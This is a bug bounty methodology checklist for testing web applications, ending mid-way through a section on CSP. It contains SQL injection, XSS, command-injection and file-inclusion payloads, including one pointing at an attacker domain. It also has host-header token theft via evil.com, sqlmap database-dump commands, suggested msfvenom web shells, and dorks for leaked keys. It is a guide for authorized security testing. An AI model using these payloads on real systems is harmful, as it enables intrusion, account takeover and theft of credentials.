Bug Bounty Methodology

* Special pages checklist
** Registration page:
*** Do they allow uploading a photo? (change the extension to .pdf, .doc, .docx, .pptx, .xlxs, .txt, .xml and .svg to see
how it's handled)
*** Display name and profile description: Again these may not be seen until after you
complete the signup process, but where are they reflected and what characters are
allowed?(test for xss,ssti and csti)
*** Can I register with my social media account? If yes, is this implemented via some
type of Oauth flow which contains tokens which I may be able to leak? What type social media
accounts are allowed? What information do they trust from my social media profile?
zseanos once discovered stored XSS via importing my facebook album conveniently named
<script>alert(0)</script> .
*** What characters are allowed? Is <> ' allowed in my name? (at this stage, enter the
XSS process testing. <script>Test may not work but <script does.) What about unicode, %00,
%0d. How will it react to me providing myemail%00@email.com? It may read it as
myemail@email.com. Is it the same when signing up with their mobile app?
*** Can I sign up using @target.com or is it blacklisted? If yes to being blacklisted,
question why? Perhaps it has special privileges/features after signing up? Can you bypass
this? Always sign up using your targets email address.
*** What happens if I revisit the register page after signing up? Does it redirect, and can
I control this with a parameter? (Most likely yes!) What happens if I re-sign up as an
authenticated user? Think about it from a developers perspective: they want the user to have
a good experience so revisiting the register page when authenticated should redirect you.
Enter the need for parameters to control where to redirect the user!
*** What parameters are used on this endpoint? Any listed in the source or javascript? Is it
the same for every language type as well device? (Desktop vs mobile)
*** If applicable, what do the .js files do on this page? Perhaps the login page has a specific
login.js file which contains more URLs. This also may give you an indication that the site
relies on a .js file for each feature.
*** What does Google know about the register page? Login/register pages change often (user
experience again) and Google robots indexes and remembers a LOT.
site:example.com inurl:register inurl:& site:example.com inurl:signup inurl:& site:example.com
inurl:join inurl:&
*** Do they allow weak passwords?
*** If you register with an existing username, will you be able to enumerate users?
*** Test for weak, pre-generated questions and answers (for example,favorite color, which can
easily be brute-forced).
** Login page (this includes the admin page):
*** Is there a redirect parameter used on the login page? Even if you don t see one being used
always try the most common, in various upper/lower cases:
returnUrl, goto, return_url, returnUri, cancelUrl, back, returnTo
*** What happens if I try login with myemail%00@email.com - does it recognise it as
myemail@email.com and maybe log me in? If yes, try signup with my%00email@email.com and try for
an account takeover. Do the same when claiming a username too
*** Can I login with my social media account? If yes, is this implemented via some type of Oauth
flow which contains tokens which I may be able to leak? What social media accounts are allowed?
Is it the same for all countries? This would typically be related to the registration process
however not always. Sometimes you can only login via social media and NOT register, and you
connect it once logged in. (Which would be another process to test in itself!)
*** How does the mobile login flow differ from desktop?
*** Test for default credentials (for example, username=admin and password=admin).
*** Brute-force credentials using a dictionary file.
*** Test for a lockout after a number of failed attempts for accomplishing a DOS instead.
*** Does it use CAPTCHA? It allows for defending against automated attacks.
*** Authentication Bypass
**** Use SQL injection to bypass authentication.
**** Default & Master OTP(e.g 0000,00000,000000,1234,12345,123456,1111,11111,111111)
**** Input character in the OTP field in burp and edit response field to successful response
**** Bypass Captcha by modifying response field
**** IDOR by modifying ID in response
**** Disclosure of OTP in response
*** Do they use remember me passwords?
** Reset change password page:
*** When resetting your password what parameters are used? Perhaps it will be vulnerable to
IDOR (try injecting an id parameter and testing for HPP!). Is the host header trusted? Imagine
when resetting password you set the host to: Host:evil.com, will it then trust this value &
send it in the email, leading to reset password token leak when the user clicks on the link
(leading to evil.com/resetpassword?token=123)
*** Test whether a user can change someone else's password (for example, change the admin
password).
*** Check the workflow of password changing and resetting.
*** Does the user receive a confirmation email after the change/reset?
*** What information is required to reset/change a password?
*** How strong (or random) are the new, temporary passwords (for password resets)?
*** Is the user forced to change the random password after his or her first login(for password
resets)?
*** For password changes, is the user required to enter his or her old password during the
changing process?
** Updating account information:
*** Is there any CSRF protection when updating your profile information? (There should be, so
expect it. Remember, we're expecting this site to be secure and we want to challenge ourselves on
bypassing their protection). If yes, how is this validated? What happens if I send a blank CSRF
token, or a token with the same length?
*** Any second confirmation for changing your email/password? If no, then you can chain this with
XSS for account takeover. Typically by itself it isn t an issue, but if the program wants to see
impact from XSS then this is something to consider.

*** How do they handle basic < > ' characters and where are they reflected? What about unicode?
%09 %07 %0d%0a - These characters should be tested everywhere possible. It's mentioned a few times,
but sometimes things can be overlooked. Leave no stone unturned.
*** If I can input my own URL on my profile, what filtering is in place to prevent something such
as javascript:alert(0)? This is a key area I look for when setting up my profile.
*** Is updating my account information different on the mobile app? Most mobile apps will use an
API to update information so maybe it's vulnerable to IDOR. As well as this, different filtering may
apply. I ve had lots of cases where XSS was filtered on the desktop site but it wasn't on the mobile
application.
*** How do they handle photo/video uploads (if available)? What sort of filtering is in place? Can I
upload .txt even though it says only .jpg .png is allowed? Do they store these files on the root
domain or is it hosted elsewhere? Even if it's stored elsewhere (example-cdn.com) check if this domain
is included in the CSP as it may still be useful.
*** What information is actually available on my public profile that I can control? The key is what
you can control how and where it is reflected. What's in place to prevent me from entering malicious
HTML in my bio for example? Perhaps they ve used html entities so < > is filtered, and it's reflected
as:
<div id= example onclick= runjs( userinput<" ); >
But you could use );alert( example ); which results in:
<div id= example onclick= runjs( userinput );alert( example ); >
** Developer tools(Developer tools would include something such as testing webhooks, oauth flows,
graphql explorers. These are tools setup specifically for developers to explore and test various API s
publicly available.)
*** Where are they hosted? Do they host it themselves or is it hosted on AWS (usually it is. This is
important because if it is hosted on AWS then your aim will be to read AWS keys).
*** What tools are available for developers? Can I test a webhook event for example? Just google for
SSRF webhook and you ll see.
*** Can I actually see the response on any tools? If yes, focus on this as with the response we can
prove impact easier if we find a bug.
*** Can I create my own application and do the permissions work correctly? I had a bug where even if
the user clicked No when allowing an application the token returned would still have access anyway.
(The token should of not had permission to do anything!)
*** After creating an application, how does the login flow actually work? And when I disconnect the
application from my profile. Is the token invalidated? Are there new return_uri parameters used and
how do they work? One little trick is you may discover some companies whitelist certain domains for
debugging/testing. Try theirdomain.com as the redirectUri as well popular CDNs such as
amazonaws.com,.aws.amazon.com. http://localhost/ is common also but would not affect all users (they
have to be running something on their machine)
*** Does the wiki/help docs reveal any information on how the API works? (zseanos once ran into a
problem where I could leak a users token but I had no idea how to use it. The wiki provided information
on how the token was authenticated and he was able to create a P1 impact). API docs also reveal more API
endpoints, plus keywords for your wordlist you're building for this target.
*** Can I upload any files such as an application image? Is the filtering the same as updating my
account information or is it using a different codebase? Just because uploading your profile photo on
example.com wasn t vulnerable doesn t mean different code is used when uploading a profile photo on
developer.example.com.
*** Can I create a separate account on the developer site or does it share the same session from the
main domain? What's the login process like if so? Sometimes you can login to the developer site
(developer.example.com) via your main session (www.example.com) there will be some type of token
exchange handled by a redirect. Enter that open url redirect you ve probably discovered by now. If it s a
brand new account then re-enter the process of seeing what s reflected & where etc. I actually prefer
when you need to sign up for a new account because it means there s more than likely going to be
different code being used, resulting in a fresh new challenge and fresh new findings.
** The main feature of the site(This can depend on the website you are using but for example if the program I choose to test
was Dropbox then I would focus on how they handle file uploads and work from there on what's available. I can connect my
dropbox account on various websites so how does the third party integration work? What about asking for certain
permissions? Or if it was AOL then I would focus on AOL Mail to start with. Go for the feature the business is built around
and should contain security and see just exactly how it works. Map their features starting from the top. This can sometimes
lead you to discover lots of features and can take up lots of time, be patient & trust the process. As you test each feature you
should overtime get a mental mind map of how the website is put together [for example, you begin to notice all requests use
GraphQL, or you discover the same parameters used throughout, xyz_id=11 . Same code? One bug equals many. ])
*** Are all of the features on the main web application also available on the mobile app? Do they work
differently at all? Sometimes you may discover some features are only available on mobile apps and
NOT desktop.Don t forget to also test various country tlds (if in scope) as you may discover different
countries offer different features (which is very common for check outs for example as different payment
options will be available depending on your country)
*** What features are actually available to me, what do they do and what type of data is handled? Do
multiple features all use the same data source? (for example, imagine you have a shop and you may have
multiple areas to select an address for shipment. On the final checkout page, on the product page - to
estimate shipping). Is the request the same for each to retrieve this information (API), or is it different
parameters/endpoints throughout.
*** Can I pay for any upgraded features? If yes test with a paid vs free account. Can the free account
access paid content without actually paying? Typically payment areas are the most missed as
researchers are not happy to pay for potentially not finding an issue. Personally I have always found a
bug after upgrading but this may differ from program to program.
*** What are the oldest features? Research the company and look for features they were excited to
release but ultimately did not work out. Perhaps from dorking around you can find old files linked to this
feature which may give you a window. Old code = bugs.
*** What new features do they plan on releasing? Can I find any reference to it already on their site?
Follow them on twitter & signup to their newsletters. Stay up to date with what the company is working
on so you can get a head start at not only testing this feature when it s released, but looking for it before
it s even released (think about changing true to false?). A great article on that can be found here:
https://www.jonbottarini.com/2019/06/17/using-burp-suite-match-and-replace-settings-to-escalate-your-user-privileges-and-
find-hidden-features/
*** Do any features offer a privacy setting (private & public)? Spend time testing if something is simply
working as they ve intended it to. Is that post really private? There s no special recon or leetness
needed, you are simply looking at what s in front of you and testing if it works as intended.
*** If any features have different account level permissions (admin, moderator, user, guest) then always test the various
levels of permissions. Can a guest make API calls only a moderator should be able to? If you discover your chosen program
has various account levels then your eyes should light up with something to instantly test for.
** Payment features
*** What features are available if I upgrade my account? Can I access them without paying? Sadly
some programs will say the only impact is loss of revenue (business impact?!) and may not accept this
type of issue by itself, however from being able to upgrade from non-paying to paying you will unlock
more features to play with!
*** Is it easily obtainable from an XSS because it s in the HTML DOM? Chain XSS to leak payment
information for higher impact. Some companies love to see impact so keep this in mind.
*** What payment options are available for different countries? I ve mentioned payment features
because a specific target required phone verification to claim ownership of a page. They introduced a
new feature to run ads and if I switched my country from the United Kingdom to the United States then
I could enter my Checking Account details. The problem is, sandbox details weren t blocked. This
allowed me to bypass all their verification mechanisms and I was granted ownership.
You can find test numbers from sites such as
http://support.worldpay.com/support/kb/bg/testandgolive/tgl5103.html and
https://www.paypalobjects.com/en_GB/vhelp/paypalmanager_help/credit_card_numbers.htm
Common web page checklist
** Identify the entry points to the web page (which lead to the backend;
remember that we will use the entry points in the next steps), including:
URLs
Headers (for example, cookie, URL referrer, and so on)
HTML controls (drop-down list, radio button, hidden input, textbox,
and so on)
** Check all of the backend or third-party web services and web APIs called
using Burp Target.
** Force the URL into HTTP mode, and see if it works, or if it stays in HTTPS.
** Can we load the page without authentication? Use Request in browser incBurp (unless it's not meant to be protected).
** Try to call an admin page or resource (for example, web APIs and images) directly, with a low-level privilege.
** Test with multiple accounts that have different privileges (normal users versus admins). Use Burp's compare site maps
feature to accomplish this task.
** Check the header security best practices, making sure that the following values exist:
X-frame-options
X-content-type-options
Strict-transport-security
Content-security-policy
X-permitted-cross-domain-policies
X-XSS-protection:1;mode=block
X-content-type-options:nosniff
** Analyze the cookie/sessionID for randomness by sending it to the Burp Sequencer.
** Brute-force the cookie/sessionID by sending it to Burp Intruder. Choose sniper as an attack type, and for the payload
type, set it to Character Frobber.
** Make sure that a new session will be generated after each login.
** Try to decode the cookie/sessionID (or ASP.NET ViewState) using Burp Decoder.
** Manipulate the cookie parameters (for example, change isAdmin=0 to isAdmin=1).
** What is the duration of the session timeout?
** Check the client source code (HTML and JavaScript), looking for:
HTML comments
Debugging leftovers
Security logic flaws
The contents of the hidden input controls
Disabled controls (for example, <input disabled="true" name="secret">)
** Check whether the logout button exists on all of the authenticated pages.
** Search for an ID (for example, EmployeeID= 100) in the entry points, and brute-force it using Burp Intruder. Generally,
this test will allow you to reveal other users' data (two accounts with the same privileges, for example).
** Try to access resources that the testing account is not allowed to see (for example, pictures, documents, and so on).
** Test for CSRF using Burp CSRF POC. Generally, the Burp scanner will detect it automatically.
** Try to bypass each HTML control that has client-side validation (for example, <form action='addItem.aspx'
onsubmit='return validate(this)' >); check to see whether the server side will validate it, as well.
** Test for SQL Injection by using fuzzing techniques (use Burp Intruder or Repeater), and inject the following:
'
1; wait for delay '0:15:0'--
Use SQL map to automate it:
$sqlmap -u http://[victim IP] --crawl=1
** If you received an error message, or if the delay was executed, use SQLmap to dump the database (for the following
example, we already identified that http://10.0.0.100/index.php?id=234 is a candidate, and that the database is MySQL):
$sqlmap -u http://10.0.0.100/index.php?id=234 --dbms=mysql --dump --threads=7
** Test for XSS by using fuzzing techniques (use Burp Intruder or Repeater
and try to inject the following:
<script> alert(1) </script>
"><script>alert(1)</script>
** Test for Command Injection by using fuzzing techniques (use Burp Intruder or Repeater), and try to inject the following
(I will use the whoami command, since it exists on both Windows and Linux):
& whoami
| whoami
|| whoami
; whoami
** Test for Local File Inclusion by using fuzzing techniques (use Burp Intruder or Repeater), and try to
inject -the following (try to manually change the number of slashes to get to the correct directory):
Linux: ../../../../etc/passwd
Windows: ../../../../boot.ini
** Test for Remote File Inclusion by injecting the URL of another website
(for example, http://[victim domain]/page.php?file=http://[attackerdomain]/[infected page]).

The OWASP offers a handful of items for manual web intrusion tests at
https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
* Service Identification
** Port Scanning
*** Nmap -
* Stack Identification
** Technology Profilers
** Version Or CVSS Investigation
*** Nmap -
*** Builtwith
*** Wappalyzer
* Content Discovery
** JavaScript Analysis
Burp pro
Linkfinder -
** File/Folder Brute Force
ffuf -
* Application Features
** Business Logic Flow
*** Manual + Burp Repeater
*** Test for logic flaws (for example, purchasing an item with zero dollars, orapplying a randomly generated discount).
*** ATO due to 2FA Logic flow by modifying 2FA enable request after logout using the request for enabling or disabling
2FA
*** Email ATO by adding a secondary email and activating it with the primary email verification link,then change the
secondary email to the primary email
** File Uploads
**** XXE
*** IMAGE
**** RCE
**** XSS
**** LFI
*** HTML
**** XSS
*** PHP
**** RCE
** Upload+
*** Can you upload a web shell? (Use msfvenom.)

*** If the application allows for executables to be uploaded, will you be able to upload backdoor? (Use msfvenom.)
*** After uploading, can you access the files through a URL? Can you see others users' files?
** Interesting
*** Multi-part Forms
*** APIs
*** Parameter referencing a path or url( LFI/RFI, Open Redirect, XSS)
*** Errors!
**** Try to make the page generate an error;in another words, do error messages reveal clues to hackers?
** Other Dynamic Parameters
** ++
* Questions To Ask
** How Does The Framework Handle'"! -*&^?_+<>{} () [special]characters?
** How Does The Site Reference A User?
** Are There Multiple User Roles?
** Is Invalid Input Parameter Reflected In 404 Page?
*** XSS
* Identifying hidden contents
** Robots.txt file
** Backup files (.bak, .old)
** Other interesting files (.xls, .doc, .pdf, .txt)
** Administration URL (for example, phpmyadmin, wp-admin)
** Debugging leftover pages and URLs
** Is CMS used? (WordPress)
If you find any item in the preceding list, check its contents for juicy
information, including:Personal information,Email addresses
Credentials,An entry point to another system (for example, WordPress)
How To Hunt
* RECON
** Recon workflow
IP space discovery
TLDs, Acquisitions, & Relations
Subdomain Enum Fingerpirnting
Dorking
Content Discovery
Parameter Discovery
ASN Discovery
ASN Discovery of Target:

https://bgp.he.net ASN
using whois:
whois -h whois.cymru.com $(dig +short example.com)

NOTE: Be careful cause sometimes you might get ASN for VPSs like digital ocean etc. Don't work on
them.
Using Nmap & ASN for discoverying IP related to the targetted ASN nmap
--script targets-asn --script-args targets-asn.asn=<ASN Number>
Gathering Company intel using AMASS

amass intel -org <Organisation name(not domain)> ARIN for
ASN:
https://whois.arin.net
Site: IPINFO for ASN
https://ipinfo.io
Subdomains using ASNs using AMASS:
amass intel -asn <ASN_number>
Discovering Brands
-Looking for acquisition or related orgs to target wikipedia
Crunchbase
Crunchbase: Discover innovative companies and the people behind them Owler
Accquiredby
AcquiredBy | Definitive list of bootstrapped acquisitions
LinkedIn
ReverseWhois using amass intel module
amass intel -d [domain.com](http://domain.com) -whois
BuiltWith
BuiltWith
Google dork:
intext:"copyright ©? org_name"
Shodan Dork using HTTP favicon hashes
http.favicon.hash:<hash>
Favicon hash can be found using favfreak
** Subdomain Enumeration
Well, subdomain enumeration is important when you are hunting on wildcard enable scope programs. If
you are able to get unique subdomains that other miss then it's a good chance for you to get some bugs
General Methodology
Passive Active
Permutation
Passive
In this stage you have to use as much resources as you can to passivly gather subdomains Now a days
it's not that much hard to do with community standard tools that usages API keys
Tools
Subfinder
Amass
Assetfinder
Findomain
Active
In this stage you have to perform bruteforcing on your target host to see if the word from your wordlist
resolve as valid subdomain or not
Tools
ShuffleDNS Aiodnsbrute
Permutation
In this stage you have to play around the subdomains. Now do changed with the words and see still it
resolve as valid or not
Tools
AltDNS
DNSGen + ShuffleDNS
Reference & Resources
https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html
https://0xpatrik.com/subdomain-enumeration-2019/
https://0xpatrik.com/subdomain-enumeration-smarter/
Theres a lot you can do. For now just mentioning communty standard approaches. Will be updating it
regularly depending on the methodology comes out.
Framework
An automated framework can be used to automate those whole workflow
SEF
* SENSITIVE INFO LEAKS
** Github Recon Method

Using Github we can find sensitive infos.
Steps:
Check github with company name for API keys or passswords.
Enumerate the employees of the company from linkedin and twitter and check their repositories on
github for sensitive information.
Check source code of main website and subdomains for github links in the html comments or anywhere.
Search using ctl-F and search for keyword github
Tools and references::

?
https://github.com/BishopFox/GitGot?
https://github.com/hisxo/gitGraber?
https://github.com/tillson/git-hound?
https://securitytrails.com/blog/github-dorks
** GitHub Dork List
GitHub Dorks for Finding Files
filename:manifest.xml
filename:travis.yml
filename:vim_settings.xml
filename:database
filename:prod.exs NOT prod.secret.exs
filename:prod.secret.exs filename:.npmrc
_auth filename:.dockercfg auth

filename:WebServers.xml
filename:.bash_history
filename:sftp-config.json
filename:sftp.json path:.vscode
filename:secrets.yml password
filename:.esmtprc password
filename:passwd path:etc
filename:dbeaver-data-sources.xml
path:sites databases password
filename:config.php dbpasswd filename:prod.secret.exs
filename:configuration.php JConfig password
filename:.sh_history
shodan_api_key language:python
filename:shadow path:etc
JEKYLL_GITHUB_TOKEN
filename:proftpdpasswd
filename:.pgpass
filename:idea14.key
filename:hub oauth_token
HEROKU_API_KEY language:json
HEROKU_API_KEY language:shell
SF_USERNAME salesforce
filename:.bash_profile aws
extension:json api.forecast.io
filename:.env MAIL_HOST=smtp.gmail.com
filename:wp-config.php
extension:sql mysql dump
filename:credentials aws_access_key_id
filename:id_rsa or filename:id_dsa
GitHub Dorks for Finding Languages
language:python username
language:php username
language:sql username
language:html password
language:perl password
language:shell username
language:java api
HOMEBREW_GITHUB_API_TOKEN
language:shell
GiHub Dorks for Finding API Keys, Tokens and Passwords api_key
“api keys”
authorization_bearer:
oauth
auth
authentication
client_secret
api_token:
“api token”
client_id
password
user_password
user_pass
passcode
client_secret
secret password
hash OTP
user auth
GitHub Dorks for Finding Usernames user:name
(user:admin)
org:name (org:google type:users)

in:login ( in:login)
in:name ( in:name)
fullname:firstname lastname (fullname: ) in:email
(data in:email)
GitHub Dorks for Finding Information using Dates
created:<2012–04–05 created:>=2011–06–12
created:2016–02–07 location:iceland
created:2011–04–06..2013–01–14 in:username
GitHub Dorks for Finding Information using Extension
extension:pem private
extension:ppk private extension:sql
mysql dump
extension:sql mysql dump password
extension:json [api.forecast.io] (http://api.forecast.io/) extension:json
[mongolab.com] (http://mongolab.com/) extension:yaml
[mongolab.com] (http://mongolab.com/) [WFClient] Password=
extension:ica
extension:avastlic “[support.avast.com] (http://support.avast.com/)” extension:json
googleusercontent client_secret
** Google Dorks
Google Dorks to find Juicy Content
inurl:example.com intitle:"index of" inurl:example.com

intitle:"index of /" "*key.pem" inurl:example.com ext:log
inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv inurl:example.com
"MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git inurl:example.com
intitle:"index of" "config.db"
inurl:example.com allintext:"API_SECRET*" ext:env | ext:yml
inurl:example.com intext:admin ext:sql inurl:admin inurl:example.com
allintext:username,password filetype:log site:example.com "-----BEGIN
RSA PRIVATE KEY "
inurl:id_rsa
** Shodan CVE Dorks

Big IP shodan Search:-
http.title:"BIG-IP®-Redirect" org:Org
CVE 2020-3452
http.html_hash:-628873716 “set-cookie: webvpn;”
CVE CVE-2019-11510
http.html:/dana-na/
* ACCOUNT TAKEOVER METHODOLOGY
** Chaining Low Impact Bugs with Xss
1. I have add a session hijacking method in broken auth and session managment.
2. If you find that on target.
3. Try anyway to steal cookies on that
target. 4.Here I am saying look for xss .
5.If you find xss you can stole the cookies of victim and using session hijacking you can takeover the
account of victim.
** No Rate Limit On Login with Weak Password Policy
So if you find that target have weak password policy try to go for no rate limit attacks in poc shows by
creating very weak password of your account.
(May or may not be accepted)
** Password Reset Poisoning Leads To Token Theft 1.Go to
password reset funtion.
2.Enter email and intercept the request. 3.Change
host header to some other host i.e,
Host:target.com
Host:attacker.com
also try to add some headers without changing host like
X-Forwarded-Host: evil.com
Referrer: https://evil.com
4.Forward this if you found that in next request attacker.com means you successfully theft the token.:)
** Using Auth Bypass
Go to my Auth Bypass folder and there is a file otp bypass response manipulation that leads to account
takeovers.
** Using CSRF
1.Change Password function.
2.Email change
3.Change Security Question
** Using Sensitive Data Exposure
This is depends on your luck.
Sometimes using git recon and google recon you may found files that contains critical information like
user tokens, usernames and their password.
** Token Leaks In Response
So there are multiple ways to do it but all are same. So I
will sharing my method that I have learnt here .
Endpoints:(Register,Forget Password)
Steps(For Registration):
1.for registeration intercept the signup request that contains data you have entered. 2.Click on
action -> do -> intercept response to this request.
3. Click forward.
4. Check response it that contains any link, any token or
otp.
5. Steps(For password reset):
1. Intercept the forget password option.
2. Click on action -> do -> intercept response to this
request. 3.Click forward.
4.Check response it that contains any link,any token or otp.
* Application Level DoS
** Email Bounce Issues
-Check if Application has Invite Functionality
-Try sending Invites to Invalid Email Accounts
-Try to find Email Service Provider such as AWS SES , Hubspot , Campaign Monitor N.B: You
can find Email Service Provider by checking Email Headers
Once you have the Email Service Provider, Check there Hard Bounce Limits. Here are the limits for
some of them:
-Hubspot Hard bounces: HubSpot's hard bounce limit is 5%. For reference, many ISPs prefer bounce
rates to be under 2%.
-AWS SES: The rate of SES ranges from first 2-5% then 5-10%
Impact: Once the Hard Bounce Limits are reached, Email Service Provider will block the Company
which means, No Emails would be sent to the Users !
Reference :
https://medium.com/bugbountywriteup/an-unexpected-bounty-email-bounce-issues- b9f24a35eb68
** Long Password DoS
-As the value of password is hashed and then stored in Databases.If there is no limit on the length of the
Password, it can lead to consumption of resources for Hashing the Long Password.
How to test?
-Use a Password of length around 150-200 words to check the presense of Length Restriction
-If there is no Restriction, Choose a longer password and keep a eye on Response Time
-Check if the Application Crashes for few seconds Where to
test?
-Registration Password Field is usually restricted but the Length of Password on the Forgot Password
Page and the Change Password (As Authenticated User) Functionality is usually missing.
Resources/References:
https://www.acunetix.com/vulnerabilities/web/long-password-denial-of-service/
https://hackerone.com/reports/738569
** Long String DOS
-When you set some string so long so server cannot process it anymore it cause DOS sometime
How to test
1. Create app and put field like username or address or even profile picture name parameter (
second refrence ) like 1000 character of string .
2. Search A's account from B's account either it will
-Either it will keeping on searching for long time

-Either the application will crash (500 - Error Code)
Refrence
?https://medium.com/@shahjerry33/long-string-dos-6ba8ceab3aa0?
?https://hackerone.com/reports/764434
* AUTHENTICATION BYPASS
** 2FA Bypasses
Technique
1.Response Manipulation 2.Status
Code Manipulation 3.2FA Code
Leakage in Response 4.JS File
Analysis
5.2FA Code Reusability
6.Lack of Brute-Force Protection 7.Missing
2FA Code Integrity Validation 8.CSRF on
2FA Disabling
9.Password Reset Disable 2FA 10.Backup
Code Abuse 11.Clickjacking on 2FA
Disabling Page
12.Enabling 2FA doesn't expire Previously active Sessions
13.Bypass 2FA with null or 000000
1. Response Manipulation
-In response if "success":false
-Change it to "success":true
2. Status Code Manipulation

-If Status Code is 4xx
-Try to change it to 200 OK and see if it bypass restrictions
3.2FA Code Leakage in Response

-Check the response of the 2FA Code Triggering Request to see if the code is leaked.
4.JS File Analysis

-Rare but some JS Files may contain info about the 2FA Code, worth giving a shot
5.2FA Code Reusability

-Same code can be reused
6. Lack of Brute-Force Protection

-Possible to brute-force any length 2FA Code
7. Missing 2FA Code Integrity Validation

-Code for any user acc can be used to bypass the 2FA
8. CSRF on 2FA Disabling
-No CSRF Protection on disabling 2FA, also there is no auth confirmation
9. Password Reset Disable 2FA

-2FA gets disabled on password change/email change
10. Backup Code Abuse

-Bypassing 2FA by abusing the Backup code feature
-Use the above mentioned techniques to bypass Backup Code to remove/reset 2FA restrictions
11. Clickjacking on 2FA Disabling Page

-Iframing the 2FA Disabling page and social engineering victim to disable the 2FA
12. Enabling 2FA doesn't expire Previously active Sessions

-If the session is already hijacked and there is a session timeout vuln
13. Bypass 2FA with null or 000000

-Enter the code 000000 or null to bypass 2FA protection.
** OTP Bypass By Repeating Requests
-Bypassing OTP in registration forms by repeating the form submission multiple times using repeater
Steps :
1.Create an account with a non-existing phone number
2.Intercept the Request in BurpSuite
3. Send the request to the repeater and forward
4. Go to Repeater tab and change the non-existent phone number to your phone number
5. 5.If you got an OTP to your phone, try using that OTP to register that non-existent
number
** OTP Bypass Via Response Manipulation
Steps:-
-Register account with mobile number and request for OTP.
-Enter incorrect OTP and capture the request in Burpsuite.
-Do intercept response to this request and forward the request.
-response will be
{"verificationStatus":false,"mobile":9072346577","profileId":"84673832"}
-Change this response to
{"verificationStatus":true,"mobile":9072346577","profileId":"84673832"}
-And forward the response.
-You will be logged in to the account.
Impact: Account Takeover
Steps:-
-Go to login and wait for OTP pop up.
-Enter incorrect OTP and capture the request in Burpsuite.

-Do intercept response to this request and forward the request.
-response will be
error
-Change this response to success
-And forward the response.
-You will be logged in to the account.
Impact: Account Takeover
Steps:
1.Register 2 accounts with any 2 mobile number(first enter right otp) 2.Intercept
your request
3.click on action -> Do intercept -> intercept response to this request. 4.check
what the message will display like status:1
5.Follow the same procedure with other account but this time enter wrong otp 6.Intercept
respone to the request
7. See the message like you get status:0
8. Change status to 1 i.e, status:1 and forward the request if you logged in means you just done
authentication bypass
* Broken-Link
Hijacking Steps:
1. Manually find and click external links on the target site ( For Example:- Some Links to Social
Media Accounts or Some external Media Link)
2. While Doing Manual work also put broken-link-checker in background using below Command
interminal.
blc -rof --filter-level 3 https://example.com/ Ouput
will be like Something.
-BROKEN- https://www.linkedin.com/company/ACME-inc-/ (HTTP_999)
1.Now you need to check if company has the page or not , if no then register as the company or try to get
that username or url.
Alternate Step
1.Go to Online Broken Link Checker Or Alternative Online Broken Link Checker? 2.Input the
domain name
Reference
?https://edoverflow.com/2017/broken-link-hijacking/?
?https://medium.com/@bathinivijaysimhareddy/how-i-takeover-the-companys-linkedin-page-
790c9ed2b04d
* BROKEN AUTH AND SESSION MANAGEMENT
** Session Based Bugs
-Old Session Does Not Expire:
Steps:
1. create your account

2. open two browser eg.,chrome and
firefox 3.Login in one browser eg.chrome
4. In other browser(firefox) login either change your password or reset your password
5. After successfully changed or reset go to other browser refresh the page if you are still logged
in
Than this is an old session does not expire bug
-Session Hijacking(Intended Behavior)
Steps:
1.Create your account

2.Login your account
3.Use cookie editor extension in browser 4.Copy
all the target cookies
5. Logout your account
6. Paste that cookies in cookie editor extension
7. Refresh page if you are logged in than this is a session hijacking
Impact: If attacker get cookies of victim it will leads to account takeover.
-Password reset link token does not expire(Insecure Configurability) Steps:
1.Create your account on target

2.request a forget password link
3.Don't use that link
4. Instead logged in with your old password and change your email to other
5. Now use that password link sents to old email and check if you are able to change your
password if yes than there is the title bug.
-Server security misconfiguration -> Lack of security headers -> Cache control for a security page
Steps :
1. Login to the application

2. Navigate around the pages
3. Logout
4. Press (Alt+left-arrow) buttons
5. If you are logged in or can view the pages navigated by the user. Then you found a bug. Impact:
At a PC cafe, if a person was in a very important page with alot of details and logged out, then another
person comes and clicks back (because he didnt close the browser) then data is exposed. User
information leaked
Happy Hacking:)
Resources:Google,Youtube.
* BYPASSING CSP
** CSP Bypass
What is CSP?
CSP stands for Content Security Policy which is a mechanism to define which resources can be fetched
out or executed by a web page. In other words, it can be understood as a policy that decides which
scripts, images, iframes can be called or executed on a particular page from different locations. Content
Security Policy is implemented via response headers or meta elements of the HTML page. From there,
it’s browser’s call to follow that policy and actively block violations as they are detected.
How does it work?

CSP works by restricting the origins that active and passive content can be loaded from. It can
additionally restrict certain aspects of active content such as the execution of inline JavaScript, and the
use of eval().
Defining Resources
default-src 'none';
img-src 'self';
script-src 'self' https://code.jquery.com;
style-src 'self';
report-uri / cspreport
font-src 'self' https://addons.cdn.mozilla.net;
frame-src 'self' https://ic.paypal.com https://paypal.com;
media-src https://videos.cdn.mozilla.net;
object-src 'none';
Some defining resources
Some definitions
script-src: This directive specifies allowed sources for JavaScript. This includes not only URLs loaded
directly into elements, but also things like inline script event handlers (onclick) and XSLT stylesheets
which can trigger script execution.
default-src: This directive defines the policy for fetching resources by default. When fetch directives are
absent in CSP header the browser follows this directive by default.
Child-src: This directive defines allowed resources for web workers and embedded frame contents.
connect-src: This directive restricts URLs to load using interfaces like

,fetch,websocket,XMLHttpRequest
frame-src: This directive restricts URLs to which frames can be called out.
frame-ancestors: This directive specifies the sources that can embed the current page. This directive
applies to , , , and tags. This directive can't be used in tags and applies only to non-HTML resources.
img-src: It defines allowed sources to load images on the web page.
Manifest-src: This directive defines allowed sources of application manifest files.
media-src: It defines allowed sources from where media objects like , and can be loaded. object-src:
It defines allowed sources for the , and elements.
base-uri: It defines allowed URLs which can be loaded using element. form-action:
This directive lists valid endpoints for submission from tags.
plugin-types: It defineslimits the kinds of mime types a page may invoke.

upgrade-insecure-requests: This directive instructs browsers to rewrite URL schemes, changing HTTP to
HTTPS. This directive can be useful for websites with large numbers of old URL's that need to be
rewritten.
sandbox: sandbox directive enables a sandbox for the requested resource similar to the sandbox
attribute. It applies restrictions to a page's actions including preventing popups, preventing the
execution of plugins and scripts, and enforcing a same-origin policy.
Basic CSP Bypass

There are quit a few ways to mess up your implementation of CSP. One of the easiest ways to
misconfigure CSP is to use dangerous values when setting policies. For example suppose you have the
following CSP header:
default-src 'self' *
As you know the default-src policy acts a catch all policy. You also know that * acts as a wild card. So
this policy is basically saying allow any resources to be loaded. Its the same thing as not having a CSP
header! You should always look out for wildcard permissions.
Lets look at another CSP header:
script-src 'unsafe-inline' 'unsafe-eval' 'self' data: https://www.google.com http://www.google-

analytics.com/gtm/js https://*.gstatic.com/feedback/ https://accounts.google.com;
